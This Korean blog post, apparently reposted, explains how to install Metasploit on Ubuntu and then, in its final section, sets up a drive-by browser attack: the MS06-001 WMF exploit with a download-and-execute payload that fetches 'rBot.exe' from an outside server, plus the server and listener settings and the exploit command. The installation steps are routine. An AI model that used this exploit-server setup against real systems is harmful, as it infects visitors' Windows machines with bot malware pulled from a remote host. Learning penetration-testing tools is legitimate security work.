[보안, 제로데이 취약점 분석] [우분투] MetaSploit 설치 및 기본

[보안, 제로데이 취약점 분석] [우분투] MetaSploit 설치 및 기본

[출처] http://mcchae.egloos.com/10861669

 

MetaSploit 는 오픈소스 태생으로 HD Moore 라는 사람이 만든
취약점, 침입, IDS 시그니쳐 등에 관한 프레임워크 입니다.

처음에는 파이썬으로 개발되었다가 이후 ruby로 재 코딩을 했다고 하네요.

 

현재는 Rapid7 이라는 보안회사에 포함이 되어 사용으로 판매되고 있으나

프리 버전의 오픈소스는 계속 해서 진행되고 있습니다.

 

우분투에서 이를 설치하는 방법을 기술해 봅니다.

 

1) 설치 패키지

$ sudo apt-get install subversion ruby rubygems ruby-openssl libopenssl-ruby

 

2) 프레임웍 가져오기

$ cd

$ svn co https://www.metasploit.com/svn/framework3/trunk/

$ mv trunk metasploit

 

3) 실행

$ cd

$ cd metasploit

$ ./msfconsole

 

4) 간단한 취약점 해킹 서버로 변신

위의 콘솔 상태에서,

 

 

msf > use windows/browser/ms06_001_wmf_setabortproc

msf > set payload windows/download_exec

msf > set URL http://20.30.40.234/rBot.exe

msf > set SRVHOST 20.30.40.222

msf > set LHOST 20.30.40.222

msf > set URIPATH attack.html

msf > exploit

 

와 같은 식으로 설정합니다.